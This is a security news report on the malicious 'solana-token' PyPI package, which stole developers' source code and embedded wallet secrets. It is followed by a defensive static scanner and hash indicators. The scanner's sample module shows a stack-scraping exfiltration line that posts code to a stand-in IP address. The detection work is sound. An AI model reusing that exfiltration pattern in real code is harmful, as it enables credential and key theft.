Security Alert: Malicious Python Package Targeting Solana Developers
Security experts at RL have uncovered a harmful Python package named “solana-token” on the PyPI repository. This malicious package was designed to exploit developers working on the Solana blockchain, highlighting the persistent risks within the open-source software landscape.
Pretending to be a tool for blockchain application development, this package was downloaded over 600 times before it was identified and removed. The incident illustrates the increasing sophistication of software supply chain attacks targeting the cryptocurrency community.
This discovery serves as a stark reminder to developers to remain vigilant when using third-party libraries, as attackers are increasingly using seemingly legitimate tools to steal sensitive data and compromise secure environments.
Sample of solana-token source code showing data exfiltration.
Deceptive Tool with Hidden Dangers
The solana-token package disguised itself as a helpful tool for Solana, a high-speed, low-cost blockchain platform established in 2017 by Solana Labs and overseen by the Solana Foundation. However, hidden within its code were features designed to cause harm.
RL’s analysis revealed that the package had several characteristics typical of malicious software. These included hardcoded URLs using IP addresses to hide communication with command-and-control servers, connections to non-standard ports, and file-reading behaviors typical of infostealer malware.
Alarmingly, a particular method within the package was crafted to scan the Python execution stack, extract source code from files within the execution chain, and send this data to a remote server. The main target seems to be the theft of hardcoded cryptographic secrets—such as private keys or access credentials to cryptocurrency wallets—embedded within developers’ codebases. Such an attack could lead to severe security breaches.
Interestingly, this is not the first time a package named solana-token has been flagged as malicious. A year ago, a package with the same name but different version numbers (1.0.1 and 1.0.2, compared to the latest 0.0.1 and 0.0.2) was detected and voluntarily removed by its authors rather than by PyPI security administrators, which left the name available for reuse.
Although RL lacks concrete evidence linking the same threat actors to both campaigns, the recurrence of the package name raises suspicions. After RL’s report, PyPI administrators have now removed the latest iteration, hopefully preventing further uploads under this name.
This incident echoes earlier campaigns, such as “BIPClip” in 2024, where seven PyPI packages aimed at BIP39 mnemonic phrases for crypto wallet recovery were downloaded nearly 7,500 times, demonstrating a persistent trend of targeting crypto developers.
Rising Threats in the Crypto Supply Chain
The discovery of solana-token emphasizes the growing risk of supply chain attacks within the cryptocurrency sector. Unlike recent exploits targeting end-user applications like Atomic and Exodus wallets, this package specifically targets developers, aiming to harvest application code and embedded secrets as a precursor to broader attacks.
These tactics exploit the trust developers have in open-source repositories, transforming tools meant to streamline innovation into avenues for compromise. RL advises development teams to enhance monitoring for suspicious behaviors—such as unexpected network activity or unauthorized file access—in both open-source and commercial third-party modules.
By detecting malicious code before it infiltrates secure environments, organizations can block destructive attacks and protect critical infrastructure.
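The behaviours described above (execution-stack inspection, reading source files from the call chain, and posting them to a hardcoded IP-address URL on a non-standard port) can be screened for statically before a dependency is ever imported. The following is an added example, not code from RL or from the solana-token package: an AST-based scanner that parses a module without executing it and counts those indicators. The sample module it scans is constructed here to mirror the reported pattern, and 192.0.2.10 is a documentation address, not a real indicator.

```python
import ast, re
from collections import Counter

# Heuristics for the reported behaviours: stack introspection, file reads,
# network egress, and hardcoded IP-address URLs on non-standard ports.
STACK_CALLS = {"inspect.stack", "inspect.currentframe", "sys._getframe"}
NET_CALLS = {"requests.post", "requests.get", "urllib.request.urlopen", "socket.socket"}
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?")
STANDARD_PORTS = {"", "80", "443"}  # findall() yields "" when no port is given

def dotted_name(node):
    """Return 'pkg.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_source(source):
    """Parse one module (never executed) and count the indicators found in it."""
    hits = Counter()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in STACK_CALLS:
                hits["stack_introspection"] += 1
            elif name in NET_CALLS:
                hits["network_egress"] += 1
            elif name == "open":
                hits["file_read"] += 1
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for _host, port in IP_URL.findall(node.value):
                hits["ip_url"] += 1
                if port not in STANDARD_PORTS:
                    hits["nonstandard_port"] += 1
    return dict(hits)

def is_suspicious(hits):
    """The infostealer pattern: introspection, file read and egress together."""
    return all(k in hits for k in ("stack_introspection", "file_read", "network_egress"))

# Constructed sample mirroring the reported pattern (parsed only, never run).
SAMPLE = '''
import inspect, requests
def register_node():
    for frame in inspect.stack():
        code = open(frame.filename).read()
        requests.post("http://192.0.2.10:8123/upload", data=code)
'''
```

Run `scan_source` over every `.py` file in an unpacked sdist or wheel before installation; a module that trips `is_suspicious` or reports `nonstandard_port` deserves manual review rather than an automatic block, since legitimate tooling occasionally uses these calls individually.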
Indicators of Compromise (IOCs)
| Package Name | Version | SHA1 |
|---|---|---|
| solana-token | 0.0.1 | f4e1149360174b4fcf0dcc6e61898c8180324893 |
| solana-token | 0.0.1 | 0b8697f8e81956e7c0c5383806fa69630c38ad33 |
| solana-token | 0.0.2 | e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84 |
| solana-token | 0.0.2 | 9719d1e076ab67a18f231889cad4b451f539ce72 |